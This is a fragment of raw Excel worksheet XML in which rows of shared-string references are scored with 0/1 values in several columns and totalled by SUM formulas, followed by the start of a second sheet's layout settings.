      <c r="D14" s="3">
        <v>1</v>
      </c>
      <c r="E14" s="3">
        <v>1</v>
      </c>
      <c r="F14" s="3" t="s">
        <v>241</v>
      </c>
      <c r="G14">
        <v>1</v>
      </c>
      <c r="H14" s="3">
        <v>1</v>
      </c>
    </row>
    <row r="15" spans="1:8" ht="41.4" x14ac:dyDescent="0.25">
      <c r="A15" s="3" t="s">
        <v>12</v>
      </c>
      <c r="B15" s="3" t="s">
        <v>29</v>
      </c>
      <c r="C15" s="3" t="s">
        <v>30</v>
      </c>
      <c r="D15" s="3">
        <v>1</v>
      </c>
      <c r="E15" s="3">
        <v>1</v>
      </c>
      <c r="F15" s="3" t="s">
        <v>30</v>
      </c>
      <c r="G15">
        <v>1</v>
      </c>
      <c r="H15" s="3">
        <v>1</v>
      </c>
    </row>
    <row r="16" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A16" s="3" t="s">
        <v>242</v>
      </c>
      <c r="B16" s="3" t="s">
        <v>243</v>
      </c>
      <c r="C16" s="3" t="s">
        <v>243</v>
      </c>
      <c r="D16" s="3">
        <v>1</v>
      </c>
      <c r="E16" s="3">
        <v>1</v>
      </c>
      <c r="F16" s="3" t="s">
        <v>243</v>
      </c>
      <c r="G16">
        <v>1</v>
      </c>
      <c r="H16" s="3">
        <v>1</v>
      </c>
    </row>
    <row r="17" spans="1:8" ht="69" x14ac:dyDescent="0.25">
      <c r="A17" s="3" t="s">
        <v>244</v>
      </c>
      <c r="B17" s="3" t="s">
        <v>245</v>
      </c>
      <c r="C17" s="3" t="s">
        <v>1333</v>
      </c>
      <c r="D17" s="3">
        <v>1</v>
      </c>
      <c r="E17" s="3">
        <v>1</v>
      </c>
      <c r="F17" s="3" t="s">
        <v>245</v>
      </c>
      <c r="G17">
        <v>1</v>
      </c>
      <c r="H17" s="3">
        <v>1</v>
      </c>
    </row>
    <row r="18" spans="1:8" ht="41.4" x14ac:dyDescent="0.25">
      <c r="A18" s="3" t="s">
        <v>12</v>
      </c>
      <c r="B18" s="3" t="s">
        <v>29</v>
      </c>
      <c r="C18" s="3" t="s">
        <v>30</v>
      </c>
      <c r="D18" s="3">
        <v>1</v>
      </c>
      <c r="E18" s="3">
        <v>1</v>
      </c>
      <c r="F18" s="3" t="s">
        <v>30</v>
      </c>
      <c r="G18">
        <v>1</v>
      </c>
      <c r="H18" s="3">
        <v>1</v>
      </c>
    </row>
    <row r="19" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A19" s="3" t="s">
        <v>246</v>
      </c>
      <c r="B19" s="3" t="s">
        <v>247</v>
      </c>
      <c r="C19" s="3" t="s">
        <v>256</v>
      </c>
      <c r="D19" s="3">
        <v>1</v>
      </c>
      <c r="E19" s="3">
        <v>0</v>
      </c>
      <c r="F19" s="3" t="s">
        <v>247</v>
      </c>
      <c r="G19">
        <v>1</v>
      </c>
      <c r="H19" s="3">
        <v>1</v>
      </c>
    </row>
    <row r="20" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A20" s="3" t="s">
        <v>248</v>
      </c>
      <c r="B20" s="3" t="s">
        <v>249</v>
      </c>
      <c r="C20" s="3" t="s">
        <v>257</v>
      </c>
      <c r="D20" s="3">
        <v>1</v>
      </c>
      <c r="E20" s="3">
        <v>0</v>
      </c>
      <c r="F20" s="3" t="s">
        <v>257</v>
      </c>
      <c r="G20">
        <v>1</v>
      </c>
      <c r="H20" s="3">
        <v>0</v>
      </c>
    </row>
    <row r="21" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A21" s="3" t="s">
        <v>250</v>
      </c>
      <c r="B21" s="3" t="s">
        <v>251</v>
      </c>
      <c r="C21" s="3" t="s">
        <v>258</v>
      </c>
      <c r="D21" s="3">
        <v>1</v>
      </c>
      <c r="E21" s="3">
        <v>0</v>
      </c>
      <c r="F21" s="3" t="s">
        <v>258</v>
      </c>
      <c r="G21">
        <v>1</v>
      </c>
      <c r="H21" s="3">
        <v>0</v>
      </c>
    </row>
    <row r="22" spans="1:8" ht="41.4" x14ac:dyDescent="0.25">
      <c r="A22" s="3" t="s">
        <v>199</v>
      </c>
      <c r="B22" s="3" t="s">
        <v>200</v>
      </c>
      <c r="C22" s="3" t="s">
        <v>1905</v>
      </c>
      <c r="D22" s="3">
        <v>0</v>
      </c>
      <c r="E22" s="3">
        <v>0</v>
      </c>
      <c r="F22" s="3" t="s">
        <v>200</v>
      </c>
      <c r="G22">
        <v>1</v>
      </c>
      <c r="H22" s="3">
        <v>1</v>
      </c>
    </row>
    <row r="23" spans="1:8" ht="69" x14ac:dyDescent="0.25">
      <c r="A23" s="3" t="s">
        <v>252</v>
      </c>
      <c r="B23" s="3" t="s">
        <v>253</v>
      </c>
      <c r="C23" s="3" t="s">
        <v>1332</v>
      </c>
      <c r="D23" s="3">
        <v>1</v>
      </c>
      <c r="E23" s="3">
        <v>1</v>
      </c>
      <c r="F23" s="3" t="s">
        <v>253</v>
      </c>
      <c r="G23">
        <v>1</v>
      </c>
      <c r="H23" s="3">
        <v>1</v>
      </c>
    </row>
    <row r="24" spans="1:8" ht="69" x14ac:dyDescent="0.25">
      <c r="A24" s="3" t="s">
        <v>254</v>
      </c>
      <c r="B24" s="3"/>
      <c r="C24" s="3"/>
      <c r="D24" s="3"/>
      <c r="E24" s="3"/>
      <c r="F24" s="3"/>
    </row>
    <row r="25" spans="1:8" ht="82.8" x14ac:dyDescent="0.25">
      <c r="A25" s="3" t="s">
        <v>255</v>
      </c>
      <c r="B25" s="3"/>
      <c r="C25" s="3"/>
      <c r="D25" s="3"/>
      <c r="E25" s="3"/>
      <c r="F25" s="3"/>
    </row>
    <row r="26" spans="1:8" s="6" customFormat="1" ht="17.399999999999999" x14ac:dyDescent="0.3">
      <c r="A26" s="18" t="s">
        <v>41</v>
      </c>
      <c r="D26" s="6">
        <f>SUM(D4:D25)</f>
        <v>18</v>
      </c>
      <c r="E26" s="6">
        <f t="shared" ref="E26:H26" si="0">SUM(E4:E25)</f>
        <v>15</v>
      </c>
      <c r="F26" s="6">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="G26" s="6">
        <f t="shared" si="0"/>
        <v>20</v>
      </c>
      <c r="H26" s="6">
        <f t="shared" si="0"/>
        <v>17</v>
      </c>
    </row>
    <row r="29" spans="1:8" ht="25.2" x14ac:dyDescent="0.45">
      <c r="A29" s="25" t="s">
        <v>44</v>
      </c>
      <c r="B29" s="25"/>
      <c r="C29" s="25"/>
      <c r="D29" s="25"/>
      <c r="E29" s="25"/>
      <c r="F29" s="25"/>
      <c r="G29" s="25"/>
      <c r="H29" s="25"/>
    </row>
    <row r="30" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A30" s="4" t="s">
        <v>1</v>
      </c>
      <c r="B30" s="4" t="s">
        <v>2</v>
      </c>
      <c r="C30" s="4" t="s">
        <v>3</v>
      </c>
      <c r="D30" s="4" t="s">
        <v>5</v>
      </c>
      <c r="E30" s="4" t="s">
        <v>6</v>
      </c>
      <c r="F30" s="4" t="s">
        <v>4</v>
      </c>
      <c r="G30" s="4" t="s">
        <v>5</v>
      </c>
      <c r="H30" s="4" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="31" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A31" s="3" t="s">
        <v>45</v>
      </c>
      <c r="B31" s="3" t="s">
        <v>56</v>
      </c>
      <c r="C31" s="3" t="s">
        <v>56</v>
      </c>
      <c r="D31">
        <v>1</v>
      </c>
      <c r="E31" s="20">
        <v>1</v>
      </c>
      <c r="F31" s="3" t="s">
        <v>56</v>
      </c>
      <c r="G31" s="20">
        <v>1</v>
      </c>
      <c r="H31" s="20">
        <v>1</v>
      </c>
    </row>
    <row r="32" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A32" s="3" t="s">
        <v>46</v>
      </c>
      <c r="B32" s="3" t="s">
        <v>57</v>
      </c>
      <c r="C32" s="3" t="s">
        <v>57</v>
      </c>
      <c r="D32">
        <v>1</v>
      </c>
      <c r="E32" s="20">
        <v>1</v>
      </c>
      <c r="F32" s="3" t="s">
        <v>57</v>
      </c>
      <c r="G32" s="20">
        <v>1</v>
      </c>
      <c r="H32" s="20">
        <v>1</v>
      </c>
    </row>
    <row r="33" spans="1:8" s="8" customFormat="1" x14ac:dyDescent="0.25">
      <c r="A33" s="27" t="s">
        <v>1270</v>
      </c>
      <c r="B33" s="3" t="s">
        <v>59</v>
      </c>
      <c r="C33" s="3" t="s">
        <v>59</v>
      </c>
      <c r="D33" s="8">
        <v>1</v>
      </c>
      <c r="E33" s="20">
        <v>1</v>
      </c>
      <c r="F33" s="3" t="s">
        <v>59</v>
      </c>
      <c r="G33" s="20">
        <v>1</v>
      </c>
      <c r="H33" s="20">
        <v>1</v>
      </c>
    </row>
    <row r="34" spans="1:8" ht="41.4" customHeight="1" x14ac:dyDescent="0.25">
      <c r="A34" s="27"/>
      <c r="B34" s="3" t="s">
        <v>1082</v>
      </c>
      <c r="C34" s="3" t="s">
        <v>1082</v>
      </c>
      <c r="D34">
        <v>1</v>
      </c>
      <c r="E34" s="20">
        <v>1</v>
      </c>
      <c r="F34" s="3" t="s">
        <v>1082</v>
      </c>
      <c r="G34" s="20">
        <v>1</v>
      </c>
      <c r="H34" s="20">
        <v>1</v>
      </c>
    </row>
    <row r="35" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A35" s="3" t="s">
        <v>1271</v>
      </c>
      <c r="B35" s="3" t="s">
        <v>60</v>
      </c>
      <c r="C35" s="3" t="s">
        <v>60</v>
      </c>
      <c r="D35">
        <v>1</v>
      </c>
      <c r="E35" s="20">
        <v>1</v>
      </c>
      <c r="F35" s="3" t="s">
        <v>60</v>
      </c>
      <c r="G35" s="20">
        <v>1</v>
      </c>
      <c r="H35" s="20">
        <v>1</v>
      </c>
    </row>
    <row r="36" spans="1:8" ht="41.4" x14ac:dyDescent="0.25">
      <c r="A36" s="3" t="s">
        <v>1273</v>
      </c>
      <c r="B36" s="3" t="s">
        <v>62</v>
      </c>
      <c r="C36" s="3" t="s">
        <v>62</v>
      </c>
      <c r="D36">
        <v>1</v>
      </c>
      <c r="E36" s="20">
        <v>1</v>
      </c>
      <c r="F36" s="3" t="s">
        <v>62</v>
      </c>
      <c r="G36" s="20">
        <v>1</v>
      </c>
      <c r="H36" s="20">
        <v>1</v>
      </c>
    </row>
    <row r="37" spans="1:8" ht="41.4" x14ac:dyDescent="0.25">
      <c r="A37" s="3" t="s">
        <v>1274</v>
      </c>
      <c r="B37" s="3" t="s">
        <v>1275</v>
      </c>
      <c r="C37" s="3" t="s">
        <v>1275</v>
      </c>
      <c r="D37">
        <v>1</v>
      </c>
      <c r="E37" s="20">
        <v>1</v>
      </c>
      <c r="F37" s="3" t="s">
        <v>1275</v>
      </c>
      <c r="G37" s="20">
        <v>1</v>
      </c>
      <c r="H37" s="20">
        <v>1</v>
      </c>
    </row>
    <row r="38" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A38" s="3" t="s">
        <v>1276</v>
      </c>
      <c r="B38" s="3" t="s">
        <v>1277</v>
      </c>
      <c r="C38" s="3" t="s">
        <v>1277</v>
      </c>
      <c r="D38">
        <v>1</v>
      </c>
      <c r="E38" s="20">
        <v>1</v>
      </c>
      <c r="F38" s="3" t="s">
        <v>1277</v>
      </c>
      <c r="G38" s="20">
        <v>1</v>
      </c>
      <c r="H38" s="20">
        <v>1</v>
      </c>
    </row>
    <row r="39" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A39" s="3" t="s">
        <v>1278</v>
      </c>
      <c r="B39" s="3" t="s">
        <v>65</v>
      </c>
      <c r="C39" s="3" t="s">
        <v>65</v>
      </c>
      <c r="D39">
        <v>1</v>
      </c>
      <c r="E39" s="20">
        <v>1</v>
      </c>
      <c r="F39" s="3" t="s">
        <v>65</v>
      </c>
      <c r="G39" s="20">
        <v>1</v>
      </c>
      <c r="H39" s="20">
        <v>1</v>
      </c>
    </row>
    <row r="40" spans="1:8" ht="41.4" x14ac:dyDescent="0.25">
      <c r="A40" s="3" t="s">
        <v>1221</v>
      </c>
      <c r="B40" s="3" t="s">
        <v>1222</v>
      </c>
      <c r="C40" s="3" t="s">
        <v>1222</v>
      </c>
      <c r="D40">
        <v>1</v>
      </c>
      <c r="E40" s="20">
        <v>1</v>
      </c>
      <c r="F40" s="3" t="s">
        <v>1222</v>
      </c>
      <c r="G40" s="20">
        <v>1</v>
      </c>
      <c r="H40" s="20">
        <v>1</v>
      </c>
    </row>
    <row r="41" spans="1:8" ht="41.4" x14ac:dyDescent="0.25">
      <c r="A41" s="3" t="s">
        <v>1279</v>
      </c>
      <c r="B41" s="3" t="s">
        <v>1280</v>
      </c>
      <c r="C41" s="3" t="s">
        <v>1280</v>
      </c>
      <c r="D41">
        <v>1</v>
      </c>
      <c r="E41" s="20">
        <v>1</v>
      </c>
      <c r="F41" s="3" t="s">
        <v>1280</v>
      </c>
      <c r="G41" s="20">
        <v>1</v>
      </c>
      <c r="H41" s="20">
        <v>1</v>
      </c>
    </row>
    <row r="42" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A42" s="3" t="s">
        <v>1281</v>
      </c>
      <c r="B42" s="3" t="s">
        <v>1282</v>
      </c>
      <c r="C42" s="3" t="s">
        <v>1282</v>
      </c>
      <c r="D42">
        <v>1</v>
      </c>
      <c r="E42" s="20">
        <v>1</v>
      </c>
      <c r="F42" s="3" t="s">
        <v>1282</v>
      </c>
      <c r="G42" s="20">
        <v>1</v>
      </c>
      <c r="H42" s="20">
        <v>1</v>
      </c>
    </row>
    <row r="43" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A43" s="3" t="s">
        <v>1283</v>
      </c>
      <c r="B43" s="3" t="s">
        <v>1284</v>
      </c>
      <c r="C43" s="3" t="s">
        <v>1284</v>
      </c>
      <c r="D43">
        <v>1</v>
      </c>
      <c r="E43" s="20">
        <v>1</v>
      </c>
      <c r="F43" s="3" t="s">
        <v>1284</v>
      </c>
      <c r="G43" s="20">
        <v>1</v>
      </c>
      <c r="H43" s="20">
        <v>1</v>
      </c>
    </row>
    <row r="44" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A44" s="3" t="s">
        <v>1285</v>
      </c>
      <c r="B44" s="3" t="s">
        <v>1286</v>
      </c>
      <c r="C44" s="3" t="s">
        <v>1286</v>
      </c>
      <c r="D44">
        <v>1</v>
      </c>
      <c r="E44" s="20">
        <v>1</v>
      </c>
      <c r="F44" s="3" t="s">
        <v>1286</v>
      </c>
      <c r="G44" s="20">
        <v>1</v>
      </c>
      <c r="H44" s="20">
        <v>1</v>
      </c>
    </row>
    <row r="45" spans="1:8" ht="41.4" x14ac:dyDescent="0.25">
      <c r="A45" s="3" t="s">
        <v>1226</v>
      </c>
      <c r="B45" s="3" t="s">
        <v>1227</v>
      </c>
      <c r="C45" s="3" t="s">
        <v>1227</v>
      </c>
      <c r="D45">
        <v>1</v>
      </c>
      <c r="E45" s="20">
        <v>1</v>
      </c>
      <c r="F45" s="3" t="s">
        <v>1227</v>
      </c>
      <c r="G45" s="20">
        <v>1</v>
      </c>
      <c r="H45" s="20">
        <v>1</v>
      </c>
    </row>
    <row r="46" spans="1:8" s="19" customFormat="1" x14ac:dyDescent="0.25">
      <c r="A46" s="27" t="s">
        <v>1287</v>
      </c>
      <c r="B46" s="3" t="s">
        <v>1241</v>
      </c>
      <c r="C46" s="3" t="s">
        <v>1241</v>
      </c>
      <c r="D46" s="19">
        <v>1</v>
      </c>
      <c r="E46" s="20">
        <v>1</v>
      </c>
      <c r="F46" s="3" t="s">
        <v>1241</v>
      </c>
      <c r="G46" s="20">
        <v>1</v>
      </c>
      <c r="H46" s="20">
        <v>1</v>
      </c>
    </row>
    <row r="47" spans="1:8" ht="41.4" customHeight="1" x14ac:dyDescent="0.25">
      <c r="A47" s="27"/>
      <c r="B47" s="3" t="s">
        <v>1241</v>
      </c>
      <c r="C47" s="3" t="s">
        <v>1241</v>
      </c>
      <c r="D47">
        <v>1</v>
      </c>
      <c r="E47" s="20">
        <v>1</v>
      </c>
      <c r="F47" s="3" t="s">
        <v>1241</v>
      </c>
      <c r="G47" s="20">
        <v>1</v>
      </c>
      <c r="H47" s="20">
        <v>1</v>
      </c>
    </row>
    <row r="48" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A48" s="3" t="s">
        <v>1044</v>
      </c>
      <c r="B48" s="3" t="s">
        <v>1045</v>
      </c>
      <c r="C48" s="3" t="s">
        <v>1045</v>
      </c>
      <c r="D48">
        <v>1</v>
      </c>
      <c r="E48" s="20">
        <v>1</v>
      </c>
      <c r="F48" s="3" t="s">
        <v>1045</v>
      </c>
      <c r="G48" s="20">
        <v>1</v>
      </c>
      <c r="H48" s="20">
        <v>1</v>
      </c>
    </row>
    <row r="49" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A49" s="3" t="s">
        <v>1289</v>
      </c>
      <c r="B49" s="3" t="s">
        <v>1290</v>
      </c>
      <c r="C49" s="3" t="s">
        <v>1290</v>
      </c>
      <c r="D49">
        <v>1</v>
      </c>
      <c r="E49" s="20">
        <v>1</v>
      </c>
      <c r="F49" s="3" t="s">
        <v>1290</v>
      </c>
      <c r="G49" s="20">
        <v>1</v>
      </c>
      <c r="H49" s="20">
        <v>1</v>
      </c>
    </row>
    <row r="50" spans="1:8" s="19" customFormat="1" x14ac:dyDescent="0.25">
      <c r="A50" s="27" t="s">
        <v>1291</v>
      </c>
      <c r="B50" s="3" t="s">
        <v>1337</v>
      </c>
      <c r="C50" s="3" t="s">
        <v>1337</v>
      </c>
      <c r="D50" s="19">
        <v>1</v>
      </c>
      <c r="E50" s="20">
        <v>1</v>
      </c>
      <c r="F50" s="3" t="s">
        <v>1337</v>
      </c>
      <c r="G50" s="20">
        <v>1</v>
      </c>
      <c r="H50" s="20">
        <v>1</v>
      </c>
    </row>
    <row r="51" spans="1:8" ht="41.4" customHeight="1" x14ac:dyDescent="0.25">
      <c r="A51" s="27"/>
      <c r="B51" s="3" t="s">
        <v>1255</v>
      </c>
      <c r="C51" s="3" t="s">
        <v>1255</v>
      </c>
      <c r="D51">
        <v>1</v>
      </c>
      <c r="E51" s="20">
        <v>1</v>
      </c>
      <c r="F51" s="3" t="s">
        <v>1255</v>
      </c>
      <c r="G51" s="20">
        <v>1</v>
      </c>
      <c r="H51" s="20">
        <v>1</v>
      </c>
    </row>
    <row r="52" spans="1:8" s="19" customFormat="1" x14ac:dyDescent="0.25">
      <c r="A52" s="27" t="s">
        <v>1292</v>
      </c>
      <c r="B52" s="3" t="s">
        <v>1191</v>
      </c>
      <c r="C52" s="3" t="s">
        <v>1191</v>
      </c>
      <c r="D52" s="19">
        <v>1</v>
      </c>
      <c r="E52" s="20">
        <v>1</v>
      </c>
      <c r="F52" s="3" t="s">
        <v>1191</v>
      </c>
      <c r="G52" s="20">
        <v>1</v>
      </c>
      <c r="H52" s="20">
        <v>1</v>
      </c>
    </row>
    <row r="53" spans="1:8" ht="27.6" customHeight="1" x14ac:dyDescent="0.25">
      <c r="A53" s="27"/>
      <c r="B53" s="3" t="s">
        <v>1125</v>
      </c>
      <c r="C53" s="3" t="s">
        <v>1338</v>
      </c>
      <c r="D53">
        <v>0</v>
      </c>
      <c r="E53" s="20">
        <v>0</v>
      </c>
      <c r="F53" s="3" t="s">
        <v>1255</v>
      </c>
      <c r="G53" s="20">
        <v>0</v>
      </c>
      <c r="H53" s="20">
        <v>0</v>
      </c>
    </row>
    <row r="54" spans="1:8" ht="138" x14ac:dyDescent="0.25">
      <c r="A54" s="3" t="s">
        <v>1293</v>
      </c>
      <c r="B54" s="3" t="s">
        <v>1294</v>
      </c>
      <c r="C54" s="3" t="s">
        <v>1294</v>
      </c>
      <c r="D54">
        <v>1</v>
      </c>
      <c r="E54" s="20">
        <v>1</v>
      </c>
      <c r="F54" s="3" t="s">
        <v>1294</v>
      </c>
      <c r="G54" s="20">
        <v>1</v>
      </c>
      <c r="H54" s="20">
        <v>1</v>
      </c>
    </row>
    <row r="55" spans="1:8" s="6" customFormat="1" ht="17.399999999999999" x14ac:dyDescent="0.3">
      <c r="A55" s="18" t="s">
        <v>41</v>
      </c>
      <c r="D55" s="6">
        <f>SUM(D31:D54)</f>
        <v>23</v>
      </c>
      <c r="E55" s="6">
        <f t="shared" ref="E55:H55" si="1">SUM(E31:E54)</f>
        <v>23</v>
      </c>
      <c r="F55" s="6">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="G55" s="6">
        <f t="shared" si="1"/>
        <v>23</v>
      </c>
      <c r="H55" s="6">
        <f t="shared" si="1"/>
        <v>23</v>
      </c>
    </row>
    <row r="56" spans="1:8" x14ac:dyDescent="0.25">
      <c r="F56" s="19"/>
    </row>
  </sheetData>
  <mergeCells count="7">
    <mergeCell ref="A50:A51"/>
    <mergeCell ref="A52:A53"/>
    <mergeCell ref="A1:H1"/>
    <mergeCell ref="A2:H2"/>
    <mergeCell ref="A29:H29"/>
    <mergeCell ref="A33:A34"/>
    <mergeCell ref="A46:A47"/>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3461-FEA9-41B7-A1F6-6F973F24D744}">
  <dimension ref="A1:H74"/>
  <sheetViews>
    <sheetView topLeftCell="A70" zoomScaleNormal="100" workbookViewId="0">
      <selection activeCell="I75" sqref="I75"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="13.8" x14ac:dyDescent="0.25"/>
  <cols>
    <col min="1" max="1" width="25.33203125" customWidth="1"/>
    <col min="2" max="2" width="23.88671875" customWidth="1"/>
    <col min="3" max="3" width="22.88671875" customWidth="1"/>
    <col min="4" max="4" width="11.44140625" customWidth="1"/>
    <col min="5" max="5" width="10.6640625" customWidth="1"/>
    <col min="6" max="6" width="25.21875" customWidth="1"/>
    <col min="7" max="7" width="10.88671875" customWidth="1"/>
    <col min="8" max="8" width="10.77734375" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:8" ht="27.6" customHeight="1" x14ac:dyDescent="0.25">
      <c r="A1" s="29" t="s">
        <v>321</v>
      </c>
      <c r="B1" s="30"/>
      <c r="C1" s="30"/>
      <c r="D1" s="30"/>
      <c r="E1" s="30"/>
      <c r="F1" s="30"/>
      <c r="G1" s="30"/>
      <c r="H1" s="30"/>
    </row>
    <row r="2" spans="1:8" ht="25.2" x14ac:dyDescent="0.25">
      <c r="A2" s="31" t="s">
        <v>0</v>
      </c>
      <c r="B2" s="31"/>
      <c r="C2" s="31"/>
      <c r="D2" s="31"/>
      <c r="E2" s="31"/>
      <c r="F2" s="31"/>
      <c r="G2" s="31"/>
      <c r="H2" s="31"/>
    </row>
    <row r="3" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3" s="14" t="s">
        <v>1</v>
      </c>
      <c r="B3" s="14" t="s">
        <v>2</v>
      </c>
      <c r="C3" s="14" t="s">
        <v>3</v>
      </c>
      <c r="D3" s="14" t="s">
        <v>5</v>
      </c>
      <c r="E3" s="14" t="s">
        <v>6</v>
      </c>
      <c r="F3" s="14" t="s">
        <v>4</v>
      </c>
      <c r="G3" s="14" t="s">
        <v>5</v>
      </c>
      <c r="H3" s="14" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="4" spans="1:8" ht="82.8" x14ac:dyDescent="0.25">
      <c r="A4" s="3" t="s">
        <v>129</v>
      </c>
      <c r="B4" s="3" t="s">
        <v>24</v>
      </c>
      <c r="C4" s="3" t="s">
        <v>146</v>
      </c>
      <c r="D4">
        <v>0</v>
      </c>
      <c r="E4">
        <v>0</v>
      </c>
      <c r="F4" s="3" t="s">
        <v>24</v>
      </c>
      <c r="G4">
        <v>1</v>
      </c>
      <c r="H4">
        <v>1</v>
      </c>
    </row>
    <row r="5" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5" s="3" t="s">
        <v>260</v>
      </c>
      <c r="B5" s="3" t="s">
        <v>295</v>
      </c>
      <c r="C5" s="3" t="s">
        <v>295</v>
      </c>
      <c r="D5">
        <v>1</v>
      </c>
      <c r="E5">
        <v>1</v>
      </c>
      <c r="F5" s="3" t="s">
        <v>295</v>
      </c>
      <c r="G5">
        <v>1</v>
      </c>
      <c r="H5">
        <v>1</v>
      </c>
    </row>
    <row r="6" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6" s="3" t="s">
        <v>261</v>
      </c>
      <c r="B6" s="3" t="s">
        <v>296</v>
      </c>
      <c r="C6" s="3" t="s">
        <v>296</v>
      </c>
      <c r="D6">
        <v>1</v>
      </c>
      <c r="E6">
        <v>1</v>
      </c>
      <c r="F6" s="3" t="s">
        <v>296</v>
      </c>
      <c r="G6">
        <v>1</v>
      </c>
      <c r="H6">
        <v>1</v>
      </c>
    </row>
    <row r="7" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A7" s="3" t="s">
        <v>262</v>
      </c>
      <c r="B7" s="3" t="s">
        <v>297</v>
      </c>
      <c r="C7" s="3" t="s">
        <v>297</v>
      </c>
      <c r="D7">
        <v>1</v>
      </c>
      <c r="E7">
        <v>1</v>
      </c>
      <c r="F7" s="3" t="s">
        <v>297</v>
      </c>
      <c r="G7">
        <v>1</v>
      </c>
      <c r="H7">
        <v>1</v>
      </c>
    </row>
    <row r="8" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A8" s="3" t="s">
        <v>263</v>
      </c>
      <c r="B8" s="3" t="s">
        <v>298</v>
      </c>
      <c r="C8" s="3" t="s">
        <v>298</v>
      </c>
      <c r="D8">
        <v>1</v>
      </c>
      <c r="E8">
        <v>1</v>
      </c>
      <c r="F8" s="3" t="s">
        <v>298</v>
      </c>
      <c r="G8">
        <v>1</v>
      </c>
      <c r="H8">
        <v>1</v>
      </c>
    </row>
    <row r="9" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A9" s="3" t="s">
        <v>264</v>
      </c>
      <c r="B9" s="3" t="s">
        <v>299</v>
      </c>
      <c r="C9" s="3" t="s">
        <v>299</v>
      </c>
      <c r="D9">
        <v>1</v>
      </c>
      <c r="E9">
        <v>1</v>
      </c>
      <c r="F9" s="3" t="s">
        <v>299</v>
      </c>
      <c r="G9">
        <v>1</v>
      </c>
      <c r="H9">
        <v>1</v>
      </c>
    </row>
    <row r="10" spans="1:8" ht="41.4" x14ac:dyDescent="0.25">
      <c r="A10" s="3" t="s">
        <v>265</v>
      </c>
      <c r="B10" s="3" t="s">
        <v>300</v>
      </c>
      <c r="C10" s="3" t="s">
        <v>1907</v>
      </c>
      <c r="D10">
        <v>0</v>
      </c>
      <c r="E10">
        <v>0</v>
      </c>
      <c r="F10" s="3" t="s">
        <v>319</v>
      </c>
      <c r="G10">
        <v>1</v>
      </c>
      <c r="H10">
        <v>0</v>
      </c>
    </row>
    <row r="11" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A11" s="3" t="s">
        <v>266</v>
      </c>
      <c r="B11" s="3" t="s">
        <v>301</v>
      </c>
      <c r="C11" s="3" t="s">
        <v>316</v>
      </c>
      <c r="D11">
        <v>0</v>
      </c>
      <c r="E11">
        <v>0</v>
      </c>
      <c r="F11" s="3" t="s">
        <v>320</v>
      </c>
      <c r="G11">
        <v>1</v>
      </c>
      <c r="H11">
        <v>0</v>
      </c>
    </row>
    <row r="12" spans="1:8" ht="41.4" x14ac:dyDescent="0.25">
      <c r="A12" s="3" t="s">
        <v>267</v>
      </c>
      <c r="B12" s="3"/>
      <c r="C12" s="3"/>
      <c r="F12" s="3"/>
    </row>
    <row r="13" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A13" s="3" t="s">
        <v>12</v>
      </c>
      <c r="B13" s="3" t="s">
        <v>29</v>
      </c>
      <c r="C13" s="3" t="s">
        <v>30</v>
      </c>
      <c r="D13">
        <v>1</v>
      </c>
      <c r="E13">
        <v>1</v>
      </c>
      <c r="F13" s="3" t="s">
        <v>30</v>
      </c>
      <c r="G13">
        <v>1</v>
      </c>
      <c r="H13">
        <v>1</v>
      </c>
    </row>
    <row r="14" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A14" s="3" t="s">
        <v>268</v>
      </c>
      <c r="B14" s="3" t="s">
        <v>302</v>
      </c>
      <c r="C14" s="3" t="s">
        <v>302</v>
      </c>
      <c r="D14">
        <v>1</v>
      </c>
      <c r="E14">
        <v>1</v>
      </c>
      <c r="F14" s="3" t="s">
        <v>302</v>
      </c>
      <c r="G14">
        <v>1</v>
      </c>
      <c r="H14">
        <v>1</v>
      </c>
    </row>
    <row r="15" spans="1:8" ht="55.2" x14ac:dyDescent="0.25">
      <c r="A15" s="3" t="s">
        <v>269</v>
      </c>
      <c r="B15" s="3"/>
      <c r="C15" s="3"/>
      <c r="F15" s="3"/>
    </row>
    <row r="16" spans="1:8" ht="55.2" x14ac:dyDescent="0.25">
      <c r="A16" s="3" t="s">
        <v>270</v>
      </c>
      <c r="B16" s="3"/>
      <c r="C16" s="3"/>
      <c r="F16" s="3"/>
    </row>
    <row r="17" spans="1:8" ht="55.2" x14ac:dyDescent="0.25">
      <c r="A17" s="3" t="s">
        <v>271</v>
      </c>
      <c r="B17" s="3"/>
      <c r="C17" s="3"/>
      <c r="F17" s="3"/>
    </row>
    <row r="18" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A18" s="3" t="s">
        <v>272</v>
      </c>
      <c r="B18" s="3" t="s">
        <v>303</v>
      </c>
      <c r="C18" s="3" t="s">
        <v>303</v>
      </c>
      <c r="D18">
        <v>1</v>
      </c>
      <c r="E18">
        <v>1</v>
      </c>
      <c r="F18" s="3" t="s">
        <v>303</v>
      </c>
      <c r="G18">
        <v>1</v>
      </c>
      <c r="H18">
        <v>1</v>
